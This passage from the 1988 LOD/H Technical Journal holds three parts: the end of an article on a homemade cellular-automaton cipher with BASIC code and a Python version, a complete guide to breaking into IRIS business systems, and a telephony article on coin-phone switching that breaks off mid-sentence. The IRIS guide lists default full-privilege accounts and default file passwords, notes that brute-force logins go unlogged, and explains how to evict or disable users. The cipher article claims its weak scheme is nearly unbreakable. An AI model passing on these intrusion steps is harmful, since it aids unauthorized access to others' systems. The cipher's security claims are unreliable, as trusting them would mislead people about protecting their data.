  PRINT "Error: Character '";X$;"' not in array Q."
  END
END IF
GOTO TOP

REM **********************************************************************

End of Program Listing 1


     This method, while extremely simple, tight, and fast, is not foolproof.
Most computers use the following algorithm for generating pseudo-random
number sequences:

     x(t+1) = ax(t) + b

     x(t+1) = next random number
     x(t)   = previous random number
     a & b are constants that will cause a fairly even distribution

     For example, if you were using a three-bit system (8 possible positive
integers) you might make a = 3 & b = 7 (there's a reason behind using prime
numbers that is beyond the scope of this file.) If you seed the argument with
RANDOMIZE 5 you would get the following:

First x: x = 3*5 + 7 = 22 | Since we're restricting ourselves to three bits,
         and 22 won't fit in three bits, we'd need to perform a modulo 8 on
         the number. (Modulo divides x by eight and keeps the remainder as
         the new value of x.) So MOD(22,8) is equal to 6 (16 + 6 = 22).

     Ok, let's do some simple mapping using our vowel set and the above
three-bit random number generator. Let's say that the message reads "AAEOU".
Our first random number was 6. Our map looks like "AEIOU12345". POS(A) + 6
gives us 2 as the character.

Second x: x = 3*6 + 7 | MOD (25,8) = 1 | POS(A) + 1 gives us E.
Third x:  x = 3*1 + 7 | MOD (10,8) = 2 | POS(E) + 2 gives us O.
Fourth x: x = 3*2 + 7 | MOD (13,8) = 5 | POS(O) + 5 gives us 4.
Fifth x:  x = 3*5 + 7 | MOD (22,8) = 6 | POS(U) + 6 wraps around the map to A.

     So our original "AAEOU" is encrypted into "2E04A". This may at first
seem difficult to crack since 'A' mapped into a '2' on one pass and an 'E' on
the other, thus preventing a frequency analysis from breaking the code.
Unfortunately, if someone knows the random number algorithm, they can
easily hack out the key. Since most of the people using this will be using it
on a pc, it would be trivial to get another pc to hack it out. And even if you
protect your random number algorithm, it is still a straight linear algebra
problem that an AT could work on over a weekend and probably figure it out,
especially if there is a fairly small map to work with.

     Solution: What we need to do is combine the random mapping with a
random number generator that is tougher to figure out. Enter cellular
automatons.

     CA's were first invented in the 1940's when John von Neumann (he of
the famous bottleneck) started to explore the mathematical implications of very
simple machines. CA's are made of geometric patterns of cells that change
their state at each tick of a clock according to a fixed rule. Early work
provided automatons that could imitate a basic computer. Since the CA's are
inherently parallel (the entire geometry is updated each clock tick) and easy
to put on a chip, there is speculation that the next generation of parallel
processing computers will use CA's as a base rather than the Turing machine
model.

     You have probably seen a CA at work and not realized it if you've
ever seen the computer graphic simulation 'LIFE' developed by John Conway at
MIT to model real organisms. The rule for automaton reproduction was
incredibly simple: If a cell has two or three neighbors, no change in the
cell. Fewer or more neighbors, it starves or is overcrowded to death, and
reproduction occurs when a blank space has exactly three neighbors.

     Using these simple rules, incredibly complex patterns can be produced.
Anything that can produce complex and varied results from a small algorithm is
a good target for a random number application. Enter Stephen Wolfram from the
Institute for Advanced Study in Princeton, NJ.

     Wolfram has been doing research on one-dimensional cellular machines,
which have the advantage of being able to work with both today's machines and
future parallel machines. Wolfram has developed an automaton that is a one
dimensional circular array modified by the rule:

     a(x,t) = a(x-1,t-1) XOR (a(x,t-1) OR a(x+1,t-1)) MOD k

     Where x is the position in the array and t is the time,
     k is the number of available characters (k = LEN(Q$)),
     and a is the one-dimensional array.

     This rule has several interesting properties. The problem we had with
linear algorithms was that simple algebra could be used to analyze the
evolution of the algorithm (the patterns produced.) All that you have to do is
figure out how *one* cell evolves, then apply that pattern across the entire
array. In the above case, there is no way of analyzing the array at time t
without loading the initial conditions and running the whole thing.

     The second thing to note is that there are k to the power of w (where w
is the width (number of cells) in array a) possible states the machine can be
in, and not all of these states have a predecessor that generates them. These
states are called 'Garden of Eden' states, and can only occur if they are set
as an initial condition.

     As a result, this rule is neither a one-to-one mathematical mapping,
nor is it an onto mapping of the set of arrays into itself. In layman's
terms, this means that for any given array state it is impossible to tell what
(if any) previous state generated it by mere pattern analysis.

     While this isn't a file on breaking codes, about the only way to crack
this one that's been discovered is to load *every* k**w state into memory and
page through them searching for a pattern. This method can be defeated easily
by setting w to more than 30 cells (assuming k=256, all the ASCII characters.)
If you are using my array Q$, you might want to set w to 40 or more. Since 256
to the 30th power is about a zillion bits, roughly equal to the largest memory
bank in existence, there isn't much chance of anyone breaking it. For the
truly paranoid, set w to 50 and sleep easy at night.


     Anyway, back to the algorithm...


     Each of the cells is filled with one of the k integers from 0 to k-1,
giving each cell k possible states. Wolfram found that the string of bits
occupying the 0 position (a(0,1), a(0,2), a(0,3)...) forms a random sequence
that passes all statistical tests, sometimes with better results than standard
DES algorithms.

     Let's break this down and see what it's doing. First of all, we will
need two arrays. Each array is set up thus:


  Array for Time One
          |------|       |------|       |------|      |------|
    |---->|a(0,1)|------>|a(1,1)|------>|a(2,1)|----->|a(3,1)|-----|
    |     |------|       |------|       |------|      |------|     |
    |--------------------------------------------------------------|

  Array for Time Two
          |------|       |------|       |------|      |------|
    |---->|a(0,2)|------>|a(1,2)|------>|a(2,2)|----->|a(3,2)|-----|
    |     |------|       |------|       |------|      |------|     |
    |--------------------------------------------------------------|


     The reason we need two arrays is so you can update the array without
destroying anything in it. In other words, you start out with array 1 active,
then you update the array into array 2 and change the active array to 2. On
the next clock tick you will update the active array (now 2) into the inactive
one (now 1) and set the active array back to 1. You keep swapping like this.
Logically, you only have one array, the active one.

     To initialize the array, the ASCII values of each character in the key
are plugged into the first LEN(KEY$) spaces in the array. If you want to use a
short key, modify the code to fill the *entire* array with values of the key
(keep repeating a loop from 1 to W pulling characters out of K). Since the key
can be anything printable, use something 10-20 characters long that you can
remember; "HACK TO LIVE, LIVE TO HACK" is one of my favorites. Anyway, if you
use a short (less than 10) key in this program, the distribution will be
skewed for the first W MOD LEN(KEY$) iterations of the automaton, but will
smooth out nicely after that.

     After the array is filled, it operates exactly like the first program
*except* when it needs a random number of positions to move. Then it drops
down, updates each cell in the automaton, and then reads the value in A(0,time)
as the random number to shift by.

     Let's look at the modified encryption code.


REM ************************************************************************
REM
REM This is a modification of Program 1 that doesn't use a machine
REM specific random number generator, but instead uses a cellular automaton
REM algorithm. W is the width of the actual automaton. A is dimensioned
REM at 32 so that the W working cells sit in elements 1 to W and the two
REM wrap-around end cells in elements 0 and W+1, which keeps every
REM subscript in range on any system. Y and Y1 select the two time
REM slices (the second dimension of A): Y1 holds the current state and
REM Y receives the updated one; they are swapped after every update.
REM
REM ************************************************************************

W = 30
DIM A(32,2)
Y = 1
Y1 = 2

REM ************************************************************************
REM
REM Once again, you can set this up to use files instead of strings. And
REM note that, unlike the first example, the key doesn't have to be
REM numeric.
REM
REM ************************************************************************

INPUT "String to be encoded"; C$
INPUT "Key Please! (Can be alpha-numeric) ";K$


REM ************************************************************************
REM
REM This is where K$ is broken down into a series of characters and their
REM ASCII value shoved sequentially into array A. Only W characters fit
REM in the automaton, and an empty key would leave every cell at zero,
REM so both cases are rejected before filling the array.
REM
REM ************************************************************************

IF LEN(K$) < 1 OR LEN(K$) > W THEN
  PRINT "Key must be between 1 and";W;"characters."
  END
END IF
FOR I = 1 TO LEN(K$)
  T$ = MID$(K$,I,1)
  A(I,Y1) = ASC(T$)
NEXT I


REM ************************************************************************
REM
REM The only difference between encoding and decoding is which way you
REM move in your Q$ array space. Encoding takes the original and shifts
REM to the right, decoding takes the coded value and shifts to the left.
REM
REM ************************************************************************

REREAD:
INPUT "Encode or Decode ? ";A$
A$=LEFT$(A$,1)
IF A$="E" OR A$="e" THEN
  A=1
  GOTO HEAD
END IF
IF A$="D" OR A$="d" THEN
  A=-1
ELSE
  GOTO REREAD
END IF

REM ************************************************************************
REM
REM Q$ contains all the characters that can be encoded. Every encoded
REM character will be mapped to a character in this array. I haven't
REM included any non-standard characters, so you will have to customize
REM it to your particular keyboard/system. I've included an error check
REM that will abort the encryption if it encounters a character that isn't
REM in Q$. I have to use the STRING$ command to insert the spacebar and
REM the quote into the string. It could also be done with a CHR$(##) in
REM many BASICs. You could expand this to include any non-printable
REM characters you'd like so you could do non-text files.
REM
REM ************************************************************************

HEAD:
SPACE = 32
QUOTE = 34
Q$="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
Q$=Q$+"1234567890!@#$%^&*()-=_+[]$;:'.><,/?X|"
Q$=Q$+STRING$(1,SPACE)+STRING$(1,QUOTE)
QSIZ = LEN(Q$)
D$ = ""


REM ************************************************************************
REM
REM This is the main loop. L = length of the string to encrypt. In this
REM example, I am only encrypting a single string. Most people who will
REM actually use this will change the FOR loop to run until an EOF is
REM encountered in the input file. Since the syntax for that will vary
REM widely from system to system, I'll leave it out.
REM
REM ************************************************************************

L=LEN(C$)
FOR H = 1 TO L

  REM /* Finds character H in the input string */
  X$ = MID$(C$,H,1)

  REM /* Finds the integer location of the character in Q$
  REM    returns variable POZ */
  GOSUB LOKPOZ

  REM /* CELLULAR updates the cells in the automaton, switches the active
  REM    time value, and returns X as the number of positions to shift. */
  GOSUB CELLULAR

  REM /* Encoding (A = 1) shifts to the right by adding, decoding
  REM    (A = -1) shifts to the left by subtracting. As in Program 1 the
  REM    shift is done on a 0-based index, reduced modulo QSIZ (adding
  REM    QSIZ first so a negative remainder can't fall outside the array)
  REM    and stepped back to 1-based. This is also where the MOD k of
  REM    the rule is applied to the cell value X. */
  NUPOZ = ((POZ - 1 + A * X) MOD QSIZ + QSIZ) MOD QSIZ + 1

  REM /* Now you assign the new character in array Q$ to Y$, and append
  REM    it to your converted string */
  Y$ = MID$(Q$,NUPOZ,1)
  D$ = D$ + Y$
NEXT H

PRINT "Original = ";C$
PRINT "Modified = ";D$
END

REM /* This finds character X$ in array Q$ and returns the integer
REM    value of the location in POZ. Called from the main loop. */
LOKPOZ:
POZ = 1
TOP:
IF MID$(Q$,POZ,1) = X$ THEN RETURN
POZ = POZ + 1
IF POZ > QSIZ THEN
  PRINT "Error: Character '";X$;"' not in array Q."
  END
END IF
GOTO TOP

REM ***********************************************************************
REM
REM This is the cellular automaton
REM
REM ***********************************************************************

CELLULAR:

  REM /* Goes through the loop updating into the inactive time (1 or 2 dep-
  REM    ending on how Y and Y1 are assigned) */
  FOR I = 1 TO W
    A(I,Y) = A(I-1,Y1) XOR (A(I,Y1) OR A(I+1,Y1))
  NEXT I

  REM /* Updates the ends of the array (logical positions 0 and W+1) that
  REM    are used in calculating other fields, so the array is circular. */
  A(0,Y) = A(W+1,Y1) XOR (A(0,Y1) OR A(1,Y1))
  A(W+1,Y) = A(W,Y1) XOR (A(W+1,Y1) OR A(0,Y1))

  REM /* Assigns the first cell to X as a random number */
  X = A(1,Y)

  REM /* Flips the active time */
  TMP = Y
  Y = Y1
  Y1 = TMP

RETURN


     Ok, let's trace through a *small* example. Assume our earlier
map of "AEIOU12345" and an automaton of width 5. For a key, we'll use
"A15".

1) Assign ASC(A) to a(1,1), ASC(1) to a(2,1), ASC(5) to a(3,1).
   ("0" will represent an empty cell in this example.)
   A(time 1) = 0 65 49 53 0 0 0
   (Remember that an array of width 5 is going to have 7 actual elements)

2) Now then, we want to encrypt the string "EE3".
   First, we locate where E is in our map. LOKPOZ("E") = 2

3) Now then, we update the automaton.
   a(1,2) = 0 XOR (65 OR 49)
   a(2,2) = 65 XOR (49 OR 53)
   a(3,2) = 49 XOR (53 OR 0)
   a(4,2) = 53 XOR (0 OR 0)
   a(5,2) = 0 XOR (0 OR 0)

   Since this isn't a tutorial on binary numbers and boolean algebra, you'll
   have to trust me on this one...

   a(1,2) = 113
   a(2,2) = 116
   a(3,2) = 4
   a(4,2) = 53
   a(5,2) = 0

4) Now we update the ends.
   a(0,2) = 0 XOR (0 OR 65)
   a(6,2) = 0 XOR (0 OR 0)

   Again...
   a(0,2) = 65
   a(6,2) = 0

5) Now we switch the active time from 1 to 2, and our new automaton is
   a(time 2) = 65 113 116 4 53 0 0

6) We then pull off a(1,2) as the number to shift by.

7) Position 2 + 113 (we're encoding, so we add) is 5 (modulo arithmetic.)

8) "E" is encoded into "U".

9) We repeat this two more times (you don't really want me to step through
   it all, do you?) and end up with the encrypted version.

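The automaton of the second listing and the trace above, as an added example in Python that is not the article's own code. Cells hold whole character codes, as in the listing, so XOR and OR act on all eight bit lanes at once and the rule's MOD k is applied when the shift is reduced modulo the map size; `CellularKeystream`, `PRINTABLE_MAP` and the function names are my own.

```python
# Added example (not from the original article): the cellular-automaton
# keystream cipher of the second listing, written so the traced example
# (key "A15", width 5, message "EE3") can be checked step by step.

VOWEL_MAP = "AEIOU12345"                                   # the article's map
PRINTABLE_MAP = "".join(chr(c) for c in range(32, 127))    # constructed, 95 chars


class CellularKeystream:
    """One-dimensional circular automaton: `width` working cells in
    positions 1..width plus the two wrap-around end cells the listing keeps
    at logical positions 0 and width+1."""

    def __init__(self, key, width):
        if not key or len(key) > width:
            raise ValueError("key must be between 1 and width characters")
        self.cells = [0] * (width + 2)
        for i, ch in enumerate(key, start=1):   # ASCII codes into cells 1..
            self.cells[i] = ord(ch)

    def state(self):
        return list(self.cells)

    def step(self):
        """Apply a(x,t) = a(x-1,t-1) XOR (a(x,t-1) OR a(x+1,t-1)) to every
        cell at once (read the old slice, write a new one: the two-array
        swap of the listing) and return cell 1 as the shift amount."""
        old = self.cells
        n = len(old)
        self.cells = [old[(x - 1) % n] ^ (old[x] | old[(x + 1) % n])
                      for x in range(n)]
        return self.cells[1]


def shift_text(text, key, width, direction, alphabet):
    """Shift every character of `text` through `alphabet` by the next
    automaton output: direction +1 encrypts (right), -1 decrypts (left).
    The modulo here is the rule's MOD k with k = len(alphabet)."""
    ca = CellularKeystream(key, width)
    n = len(alphabet)
    out = []
    for ch in text:
        pos = alphabet.index(ch)        # ValueError if ch is not in the map
        out.append(alphabet[(pos + direction * ca.step()) % n])
    return "".join(out)


def encrypt(text, key, width=30, alphabet=PRINTABLE_MAP):
    return shift_text(text, key, width, +1, alphabet)


def decrypt(text, key, width=30, alphabet=PRINTABLE_MAP):
    return shift_text(text, key, width, -1, alphabet)


if __name__ == "__main__":
    ca = CellularKeystream("A15", width=5)
    print(ca.state())                # [0, 65, 49, 53, 0, 0, 0]  (time 1)
    print(ca.step(), ca.state())     # 113 [65, 113, 116, 4, 53, 0, 0]
    print(encrypt("EE3", "A15", width=5, alphabet=VOWEL_MAP))   # UO1
```

The same key and message always give the same keystream, so a message encrypted twice under one key leaks the difference of the two plaintexts exactly as any reused stream does.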
     Well, that's going to pretty much wrap this file up. If you are
interested in more files of this nature, let me know. If you find this totally
confusing, but want to learn more, call The Phoenix Project at 512/441-3088
(300/1200/2400, 24 hours a day). Our friendly and helpful LOD/H staff will be
glad to assist you. Other people who you might want to talk to about
encryption include Dr. Cypher, Tuc, and Prime Suspect.

     Also, if you are interested in seeing the above algorithm applied in
other languages let me know. If there's enough of a demand I'll release C,
Modula-2, and ADA versions.


This has been a Legion of Doom/Legion of Hackers presentation!

The Mentor
LOD/H

*****************************************************************************
References and Acknowledgments:

"How to Generate Cryptographically Strong Sequences of Pseudo-Random Bits";
M. Blum & S. Micali; SIAM Journal on Computing, vol. 13, p. 850 (1984)

"Functions of Random Variables"; John Freund & Ronald Walpole;
Mathematical Statistics, 4th Edition; Prentice-Hall Inc., NJ; pp. 240-71

"Building an Encryption System"; Peter Wayner;
Computer Language, Vol. 4, Num. 12, p. 67 (Dec. 1987 Issue)

"Random Sequence Generation by Cellular Automata"; S. Wolfram, Institute for
Advanced Study; Advances in Applied Mathematics, vol. 7, p. 123 (1986)

"Breaking Pseudo-Random Number Based Cryptographic Algorithms"; M. Vahle &
L. Tolendino; CRYPTOLOGIA, Oct 1982, p. 319

Also my thanks to: TUC, The Leftist, Prime Suspect, and Dr. Cypher, who all
contributed to this one way or another.

***************************************************************************


The LOD/H Technical Journal, Issue #3: File 07 of 10

   IIIIIIIIII   RRRRRRRRRR   IIIIIIIII    SSSSSSSSSS
       II       RR      RR      II       SS       SS
       II       RR      RR      II       SS
       II       RRRRRRRRR       II        SSSSSSSSS
       II       RR   RR         II                SS
       II       RR    RR        II       SS       SS
   IIIIIIIIII   RR     RR    IIIIIIIII    SSSSSSSSS

   #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
   |                                                     |
   #      Introduction to The Iris Operating System      #
   |                                                     |
   #                         by                          #
   |                                                     |
   #                     The Leftist                     #
   |                                                     |
   #             The Legion of Doom/Hackers              #
   |                                                     |
   #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#

                           IRIS
            <INTERACTIVE REAL TIME INFORMATION SYSTEM>

     Iris is an operating system which most people have heard little or nothing
about. Many businesses across the country are starting to use computers which
support the IRIS operating system. IRIS is not new though; it was originally
written to run on PDP-11, Data General, and Royal Systems. IRIS has grown in
popularity due to the major revisions which have been made over the years and
is a fairly easy system for anyone to learn. This article, though not a
complete guide to IRIS, will give you the basic knowledge necessary to
identify, enter, and access information once in.


Finding IRIS
------------

     You'll know you've found an IRIS system by its login banner, which usually
looks like this:

     Welcome to "IRIS" R9.1.4 timesharing

     This is Dr. BOB'S OFFICE!

     ACCOUNT ID?


Logging in
----------

     To log into an IRIS system after connecting <at 7E1 usually> press the
escape key. You should get a message asking for account ID at which point you
would enter your ID followed by a c/r. You're in the system when you get a #
prompt. If you've entered an incorrect ID, the normal error message would be:

     INVALID

     The nice thing about IRIS from a hacker point of view is that it will allow
you to brute force hack your way in, never keeping a log of unsuccessful
tries, and never hanging up on you.

     If you don't think your ID is being entered properly, you can turn the
echo back on by first hitting a Control-E. If you suspect parity trouble on
your login <ie: the E key beeps every time you hit it> try hitting a Control-P
to change the parity.


Default Accounts
----------------

     Try the account names below, and also try them with 1 or 2 spaces after
them in upper and lower case.


ACCOUNT      COMMENTS                        Privilege level
-------      --------------------------      --------------------------
MANAGER      < works 99% of the time >       3 full system priv's
BOSS         < manager account >             3 full system priv's
SOFTWARE     < software dept account >       2 general user access
DEMO         < demonstration account >       1 scum of the earth priv's
PDP8         < always on rev 7.0 >           3 full system priv's
PDP11        < always on rev 7.0 >           3 full system priv's
ACCOUNTING   < accounting dept. >            2 general user

     Also try the company's name, or its initials. Sometimes system operators
place control characters in their IDs, or spaces <usually one, sometimes two>
at the end of their account names; this security 'trick' is used due to the
operating system not asking for passwords. Like PRIMOS version 18 systems, all
|
||
you needed was a valid username to get in. There are plans of implementing
|
||
passwords in the future for IRIS.
|
||
|
||
|
||
YOU'RE IN!
|
||
----------
|
||
|
||
So you're in- hopefully with full priv's.
|
||
|
||
The users Privilege Level may be 0, 1, 2, or 3 indicating General,
|
||
Privileged, Manager, or Superuser privileges respectively. Only the Superuser
|
||
account can access the ACCOUNTS file, but all level two accounts are given
|
||
most other privileges that a level 3 account have.
|
||
|
||
If you were able to log in with a privilege level of 3, you'll be allowed
|
||
to run the program ACCOUNTUTILITY or ACCOUNTS, depending on the version of
|
||
IRIS is running. This is almost always found on LU 0, along with all the
|
||
other system utilities. ACCOUNTUTILITY is menu driven, and you should have no
|
||
problem using it.
|
||
|
||
Accounts File
|
||
-------------
|
||
|
||
The Accounts File contains the following information
|
||
|
||
Account ID
|
||
Assigned priority
|
||
Assigned Logical Unit #
|
||
Account# <Group and User>
|
||
Alloted CPU time <in seconds>
|
||
Alloted disk blocks
|
||
Number of disk blocks in use
|
||
Peak # of disk blocks in use
|
||
Net File Charges
|
||
|
||
|
||
ACCOUNTUTILITY
|
||
--------------
|
||
|
||
This program is for editing the accounts on the system. You must be a
|
||
manager on the system <level 3> to run this program, or else have a way to
|
||
change the protection of BOTH the accounts file, and the ACCOUNTUTILITY
|
||
program. If this is done, anyone can run the program. After typing
|
||
ACCOUNTUTILITY you'll get the following menu:
|
||
|
||
ACCOUNTS FILE MAINTENANCE REV 2.2
|
||
|
||
(0) EXIT TO SYSTEM
|
||
(1) ADD NEW ACCOUNT
|
||
(2) MODIFY ACCOUNT
|
||
(3) DELETE ACCOUNT
|
||
(4) INQUIRE ACCOUNT
|
||
(5) LIST THE ACCOUNTS
|
||
|
||
ENTER FUNCTION NUMBER:
|
||
|
||
It's all pretty straightforward, I don't think I need to go on about this
|
||
feature...
|
||
|
||
What to do Inside
|
||
-----------------
|
||
|
||
The first thing you want to do once inside IRIS is to issue the command PP
|
||
which will show you who's on, and what they're currently doing. Sometimes PP
|
||
has been renamed to PORT ALL MONITOR. If you logged in and it said your
|
||
Logical Unit was not active, you must install the system under the MANAGER
|
||
account. To do this, log in on a full privs account, and type IN, INSTALL, or
|
||
FASTINSTALL. This should allow you to activate all the system's Logical
|
||
Units. Normally, the Logical Units (referred to as LU's) range from 0-99, 99
|
||
being a ramdrive. If you choose to just install Logical Unit number one, the
|
||
command would be INSTALL 0.1 and so on. If you are told Logical Unit x
|
||
exists, change? DO NOT CHANGE IT! Instead, attempt to install a Logical Unit
|
||
that doesn't already exist.
|
||
|
||
To list all the files on the Logical Unit assigned to your account, type LIBR.
|
||
To list only certain files type LIBR x where x = searchcriteria.
|
||
To list the files on another LU, type LIBR x/ where x = the LU number.
|
||
To list all the files that you have read access to, type LIBR @.
|
||
To list only files that belong to you, type LIBR @g,r where g is your group,
|
||
and u is your user #.
|
||
To list files accessed within h hours, type LIBR >h where h is a decimal #.
|
||
|
||
Anyway, you'll see something like this:
|
||
|
||
#LIBR
|
||
|
||
LOGICAL UNIT #0 JUL 30, 1988 19:50:03
|
||
|
||
* FILENAME[VOL] PROT COST SIZE ACCOUNT AGE HSLA TYPE PRIV HBA
|
||
S ASM 33 $0.00 11 0, 1 11068 11068 401 3 400
|
||
B RUN 33 $0.00 21 0, 1 11068 0 602 3 344
|
||
T SU.DSUBS 22 $0.00 22 0, 1 11068 5 30 3 7
|
||
|
||
and so on....
|
||
|
||
Running Programs
|
||
----------------
|
||
|
||
Most Application Software for IRIS is written in business basic, which is
|
||
basic with extended functions specifically for business applications.
|
||
|
||
To execute a runnable file at the # prompt, just type the file's name.
|
||
To exit into basic, just type BASIC.
|
||
To run a program, simply type its name.
|
||
To load a program type BASIC LOAD x where x = filename.
|
||
To list a program once in basic, type X LIST X where, in both cases X = the
|
||
line you want to list or simply type LIST to list all the lines of the
|
||
program.
|
||
|
||
File Type Chart
|
||
|
||
Number Letter File Type
|
||
|
||
0 P Permanent System File
|
||
1 S System processor or file
|
||
2 B BASIC processor or program
|
||
3 A Stand alone processor or program
|
||
4 X EXECUTE processor or program
|
||
5 G GPM program
|
||
6 M MUMPS processor or program
|
||
7 W COURSE WRITER processor or program
|
||
20 Q Stand alone compiler
|
||
21 J Stand alone relocating assembler
|
||
22 L Stand alone relocatable loader
|
||
23 R Relocatable binary object tape image
|
||
24 I Indexed relocatable binary library
|
||
27 Z Temporary file
|
||
30 T Text file
|
||
31 F Formatted data file
|
||
32 C Contiguous data file
|
||
36 $ Peripheral device driver
|
||
|
||
Passworded Files
|
||
----------------
|
||
|
||
Sometimes a password will be added to the end of a file name to limit
|
||
access to users who have knowledge of the password. To access a passworded
|
||
file, type the following: FILEX ^Epass^E
|
||
|
||
The ^E is correctly represented as Control-E. The common defaults for
|
||
passworded files <especially on LU0> are the letter X and the word THINK.
|
||
|
||
|
||
Kicking Users off the System
|
||
----------------------------
|
||
|
||
This is something you do not want to do unless an emergency situation
|
||
arises, in which case you would issue the PPP command. This is the port
|
||
eviction utility. It will then ask you which port you would like to evict or
|
||
you may type the word ALL to evict everyone but yourself. This is useful if
|
||
you hang a printer port, or are afraid you may have dumped data to a printer
|
||
which is offline.
|
||
|
||
|
||
PORT.STAT
|
||
---------
|
||
|
||
This command gives you the status of a given port, and its channels. to
|
||
run it type:
|
||
|
||
PORT.STAT
|
||
|
||
|
||
PP
|
||
--
|
||
|
||
PP lets you see who is on the system, what port they're on, what baud rate
|
||
they're running, and what process they're running. Just type PP from the #
|
||
prompt. IRIS will give you information about the ports on the system and then
|
||
will ask you if you would like channel status. Either type in the channel that
|
||
you wish to see the status of, or hit return to exit.
|
||
|
||
|
||
GAMES
|
||
-----
|
||
|
||
Yes, there are even games on IRIS, all the old PDP games hunt the wumpus,
|
||
tic-tac-toe, etc...sure to provide hours of amusement.
|
||
|
||
|
||
Changing the Baud Rate of a Port
|
||
--------------------------------
|
||
|
||
To change a port's baud rate, type PORT BAUD x where x is a standard baud
|
||
rate <110,300,600,1200,2400,9600,19200>. Don't change the baud rate of the
|
||
port you are on. This command is useful for temporarily disabling a user.
|
||
|
||
|
||
Copying Files
|
||
-------------
|
||
|
||
Copy is a general purpose command for moving data of any type from a
|
||
specified source to a specified destination. Also, data from several sources
|
||
can be merged into one destination file.
|
||
|
||
The general form of the copy command is:
|
||
|
||
Copy dest = Source1,Source2 etc....
|
||
|
||
Where dest is the filename under which the destination file is to be built.
|
||
|
||
|
||
Mail
|
||
----
|
||
|
||
To mail a one line message to another port, the following command applies:
|
||
|
||
MAIL p "Hello My name is Joe Comosolo" where p = the port # to mail to.
|
||
|
||
|
||
Loading Text Files
|
||
------------------
|
||
|
||
A text file can be loaded by use of the command:
|
||
|
||
EDIT SFILE,DFILE
|
||
an exclamation mark must be used to copy over an existing file.
|
||
|
||
A new text file may be created by typing:
|
||
EDIT,Filename
|
||
|
||
If you just want to examine a text file, then just type
|
||
EDIT Filename
|
||
|
||
Some systems also have the TYPE filename command.
|
||
|
||
|
||
BYELOG
|
||
------
|
||
|
||
This command allows you to edit the login message you receive before you are
|
||
prompted for your account id. The syntax is:
|
||
|
||
BYELOG message to be printed
|
||
|
||
|
||
Logging Off
|
||
-----------
|
||
|
||
>From the # prompt, type BYE and hit return.
|
||
|
||
|
||
Conclusion
|
||
----------
|
||
|
||
I hope that article file proves useful. Keep it in your archives for the
|
||
next time you stumble onto an IRIS system. If you have any questions, comments,
|
||
or gripes, I can be reached on The Phoenix Project at 512/441-3088.
|
||
|
||
|
||
The LOD/H Technical Journal, Issue #3: File 08 of 11


   __________________________________________________________
  @@                                                        @@
  @@        Coin Service, The Central Office, and You       @@
  @@                                                        @@
  @@                           by                           @@
  @@                                                        @@
  @@                       Phase Jitter                     @@
  @@                                                        @@
  @@                     Legion of Doom!                    @@
  @@________________________________________________________@@


In this file I will attempt to give a basic overview of how various
central offices handle coin service. If you feel your interest grows due to
this file there are other good technical documents about coin service, i.e.
Bell System Practices, CDs, PDs, etc.


Coin service is differentiated from other services by a special class of
service. All switching systems give -48 volt battery toward the coin phone on
the ring side of the line. Coin-First lines have an open TIP during a normal
receiver-on-hook condition. When a line goes off hook the central office
takes no action and in fact can not detect the off hook condition due to the
line's conditioning for ground start. When the customer deposits money the
coin ground is extended to the ring side of the line. The ground signals the
line equipment in the central office to give a dial tone.
Dial-Tone First offices give both the battery and ground to the coin
station, thus providing a dial tone equivalent to a POTS phone. All coin
service is super current sensitive. (The central office must give at least 23
milliamps of line current and 41 milliamps of coin control current to the
farthest coin station.)


The switching systems differ in the method by which calls are handled.


No. 5 Crossbar

The No. 5 crossbar coin-first offices must have a dual wound line relay
with both windings in series when dealing with a coin first situation. If any
Coin-First lines are served in a No. 5 crossbar office the originating
registers must be able to desensitize the (pulsing) L relay by providing a
resistive ground through its tertiary winding via the coin class of service
relay.
Crossbar offices can give coin return from Originating Registers,
TSPS/Cordboard trunks, Ring and Tone trunks, Announcement trunks, and Coin
Supervisory circuits. Coin collect current is only given through
TSPS/Cordboard trunks and Coin Supervisory circuits. The only circuit that
can handle a stuck coin test is the coin supervisory circuit.
Crossbar offices handle coin actions on locally completed calls in the
coin supervisory circuit (CS). All trunks must have access to the CS circuit
or use coin junctors or coin 1A0 trunks that have such access. The use of
coin junctors or coin 1A0 trunks eliminates the need for other trunks to be
hard wired to the Coin Supervisory Link. When the trunk's supervisory relays
show a coin action is needed the trunk searches for an idle Coin Supervisory
Circuit through the Coin Supervisory Link. The bridged connection allows the
Coin Supervisory Circuit to give the proper collect or return current toward
the coin telephone and test to see if the action was successful.
Crossbar offices handle coin actions required by DDD calls or TSPS
operators in the No. 5 crossbar TSPS trunk. The TSPS base unit signals the
No. 5 office by either frequencies or multiwinks. The No. 5 office receives
these signals and the trunk applies one pulse of coin collect or return or
ring back. The No. 5 TSPS trunk does not make a test to see if the required
coin action is successful. If the coin is still present the call is dropped
and the coin remains in the trap.


ESS

ESS offices provide all coin control actions from the Coin Control
Circuit. The Coin Control Circuit is switched to a customer's line under
program control. The Coin Control Circuits always make a stuck coin test at
the end of a call.
ESS offices handle coin actions required by DDD or TSPS operators by
scanning the TSPS trunk looking for any control signals from the TSPS base
unit. When the ESS office sees a request on the TSPS trunk the ESS office
opens the talking path and attaches a multifrequency (MF) receiver. The MF
receiver looks at the tones being sent from the TSPS base unit transmitter and
checks if the signal requested is a coin collect, coin return, ring back, or
operator attached.
Dial-Tone First (DTF) offices not equipped with expanded In-Band
Signaling give +48V talk battery during operator attached and 48V talk
battery during the rest of the call. If the TSPS signals for coin return the
ESS office will open the talk path again, release the MF receiver and switch
the line to the Coin Control Circuit which applies -130V coin return
potential. After the coin control function is finished the system will make
one recycle attempt if the coin ground is still present.
Local calls are handled within the ESS machine. When a coin control
function is required the program momentarily opens the talk path and switches
the line to a Coin Control Circuit which applies the required current.

Step By Step

Coin lines in a Step By Step area are served on dedicated Line Finder
groups. The Line Finders are hardwired to a coin box trunk and then cabled to
a first selector appearance.
Step By Step offices can give coin return from coin box trunks,
TSPS/Cordboard trunks, and other miscellaneous trunks. (My knowledge of Step
By Step is vague; it's kind of like trying to research dinosaurs.)
Step By Step offices handle coin actions on local calls in the coin box
trunks. The coin box trunk applies the coin control current through the
winding of a relay to the coin station hopper trigger ground. When the coin
station ground disappears, the coin box trunk relay releases and allows the
connection to restore to normal. Some Step By Step offices have a timed
release circuit that will time out after about eight attempts of coin control
action, peg the stuck coin register, then release. If the timed release
circuit is not provided and a coin ground can not be removed, the circuit must
be manually released.
Step By Step offices handle coin actions required by DDD calls or TSPS
operators in the Step By Step TSPS trunk. The TSPS base unit signals the Step
office by either frequencies or multiwinks. The Step office trunk receives
